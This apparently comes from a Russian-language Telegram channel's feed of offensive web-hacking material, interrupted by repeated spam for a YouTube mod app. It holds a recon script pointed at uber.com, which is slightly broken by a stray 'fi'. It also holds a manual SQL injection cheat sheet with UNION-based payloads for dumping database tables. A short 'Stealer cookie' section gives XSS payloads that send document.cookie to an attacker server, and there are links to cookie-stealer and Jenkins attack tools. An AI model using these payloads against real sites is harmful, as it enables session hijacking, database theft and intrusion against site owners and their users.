Forwarded from DIMOOON 🇺🇦🦅🇺🇸
#!/bin/bash
#./script.sh uber.com
echo "Find subs"
subfinder -d $1 > subfinder;
echo "Find alive subs"
cat subfinder | httpx > subs;
echo "Find JS files & JS Secrets"
cat subs | gauplus | grep -iE '\.js' | grep -ivE '\.json' > js; cat js | while read line ; do python3 linkfinder.py -i $line -o cli; fi; done;
echo "Use screenshoter"
python EyeWitness.py -f js --web;
https://github.com/FortyNorthSecurity/EyeWitness/tree/master/Pythonhttps://github.com/projectdiscovery/subfinder
https://github.com/bp0lr/gauplus
GitHub
FortyNorthSecurity/EyeWitness
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. - FortyNorthSecurity/EyeWitness
SQL INJ ( руками )
Определить количество колонок - union select 1,2,n+1 - пока не пропадет ошибка
Определить количество полей - order by 10 | order by 20 | order by 31 | order by [n] - пока не пропадет ошибка
Запрос, что определяет точное количество полей и колонок выглядит примерно так - union select 1,2,3,n+1 order by [n]
Название базы данных - database(), @@database
Версия базы данных - version(), @@version
Название таблицы - union select 1,table_name,2,n+1 from information_schema.tables where table_schema=database() --
Название колонки - union select 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='НАЗВАНИЕ ТАБЛИЦ С ЗАПРОСА ВЫШЕ' --
Получаем информацию из колонок таблицы: union select 1,название колонки,3,4,5,6,название колонки,8,9,10,11 from НАЗВАНИЕ ТАБЛИЦЫ --
Объединить вывод: union select 1, group_concat(название колонки, название колонки, название колонки и так далее),3,4,5,6,7,8,9,10,11 from НАЗВАНИЕ ТАБЛИЦЫ --
https://infosecwriteups.com/identifying-exploiting-sql-injection-manual-automated-79c932f0c9b5Medium
Identifying & Exploiting SQL Injections: Manual & Automated
In this article, we will start by Identifying the SQL Injection vulnerabilities & how to exploit the vulnerable application. Further, we…
https://infosecwriteups.com/identifying-escalating-http-host-header-injection-attacks-7586d0ff2c67
Host-Header inj
Host-Header inj
Medium
Identifying & Escalating HTTP Host Header Injection attacks
The purpose of the HTTP Host header is to help identify which back-end component the client wants to communicate with. Several…
https://infosecwriteups.com/server-side-request-forgery-ssrf-exploitation-technique-9bc4b4045fbd
SSRF. SSRF Header Location
SSRF. SSRF Header Location
Medium
Server-Side Request Forgery — SSRF: Exploitation Technique
Server-side request forgery, or SSRF, is a vulnerability that allows an attacker to use a vulnerable server to make HTTP requests on the…
Forwarded from DIMOOON 🇺🇦🦅🇺🇸
Тестирование безопасности API - Катерина Овеченко. QA Fest 2019, https://www.youtube.com/watch?v=46N_zodwzKA
I found a free app called Pure Tuber, best YouTube Mod, No Ads,Free Premium. Highly recommend it to you.
https://play.google.com/store/apps/details?id=free.tube.premium.advanced.tuber&referrer=utm_source%3dGP_tubershare%26utm_medium%3dshare%26utm_campaign%3dGP_ptrshare
I found a free app called Pure Tuber, best YouTube Mod, No Ads,Free Premium. Highly recommend it to you.
https://play.google.com/store/apps/details?id=free.tube.premium.advanced.tuber&referrer=utm_source%3dGP_tubershare%26utm_medium%3dshare%26utm_campaign%3dGP_ptrshare
YouTube
Тестирование безопасности API - Катерина Овеченко. QA Fest 2019
Тестирование API на безопасность имеет свои специфики в сравнении с веб приложениями. В своем докладе я расскажу вам про основные уязвимости, которые встречаются в API и как их найти. Я также покажу основные инструменты, с помощью которых можно автоматизаировать…
https://github.com/Accenture/jenkins-attack-framework
Jenkins Attack Framework (White Box)
Статья: https://www.accenture.com/us-en/blogs/cyber-defense/red-teaming-jenkins-attack-framework
Jenkins Attack Framework (White Box)
Статья: https://www.accenture.com/us-en/blogs/cyber-defense/red-teaming-jenkins-attack-framework
GitHub
GitHub - Accenture/jenkins-attack-framework
Contribute to Accenture/jenkins-attack-framework development by creating an account on GitHub.
Stealer cookie:
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://yourserver/?'+document.cookie>
https://github.com/AXDOOMER/easy-xss-cookie-stealer
https://github.com/Xyl2k/Cookie-stealer
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://yourserver/?'+document.cookie>
https://github.com/AXDOOMER/easy-xss-cookie-stealer
https://github.com/Xyl2k/Cookie-stealer
GitHub
GitHub - AXDOOMER/easy-xss-cookie-stealer: XSS cookie stealer using JavaScript and PHP
XSS cookie stealer using JavaScript and PHP. Contribute to AXDOOMER/easy-xss-cookie-stealer development by creating an account on GitHub.